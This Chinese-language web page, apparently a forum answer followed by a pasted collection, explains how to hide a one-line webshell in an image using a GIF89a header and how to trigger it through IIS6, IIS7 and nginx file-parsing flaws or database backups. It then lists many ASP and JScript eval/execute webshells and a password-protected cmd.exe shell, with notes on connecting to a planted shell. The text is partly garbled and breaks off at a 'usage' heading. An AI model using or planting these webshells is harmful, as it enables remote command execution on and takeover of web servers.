如何利用图片一句话木马？

加个gif89a头部~~~或者十六进制编辑器打开正常和shell~~把shell直接粘到后面~~ 用的时候视情况而定~~~比如说IIS6的x;jpg~~IIS7/75的畸形漏洞（xjpg/shellphp）nginx08的畸形漏洞~~（同IIS7）~~~ 再就是有时候在数据库备份的时候可以利用的上~~~ xjpg备份成xphp等等~~~ 比如说前段时候camera360就是被IIS7畸形漏洞拿下的~~~ 到网安中心网站查看回答详情>>

ASP一句话木马大全！
<%eval request("MH")%>
<%execute request("MH")%>
<%execute(request("MH"))%>
<%If Request("MH")<>"" Then Execute(Request("MH"))%>
<%if request ("MH")<>""then session("MH")=request("MH"):end if:if session("MH")<>"" then execute session("MH")%>
<SCRIPT language=VBScript runat="server">execute request("MH")</SCRIPT>
<%@ Page Language="Jscript"%>
<%eval(RequestItem["MH"],"unsafe");%>
1 asp一句话木马
一句话木马 服务器端
带验证:
——————————————cmdasp————————————————
<%
if request("authkey")="pic16f873a" then
%>
<textarea readonly cols=80 rows=25>
<%responsewrite servercreateobject("wscriptshell")exec("cmdexe /c "&request("cmd"))stdoutreadall%>
</textarea>
<%
end if
%>
带验证 客户端
——————————————cmdhtml————————————————
<HTML>
<HEAD>
<meta ><%execute request(value)%
<%eval request(value)%(现在比较多见的，而且字符少，对表单字数有限制的地方特别的实用)
当知道了数据库的URL，就可以利用本地一张网页进行连接得到Webshell。（不知道数据库也可以，只要知道<%eval request(value)%这个文件被插入到哪一个ASP文件里面就可以了。）
这就被称为一句话木马，它是基于B/S结构的。
使用方法

---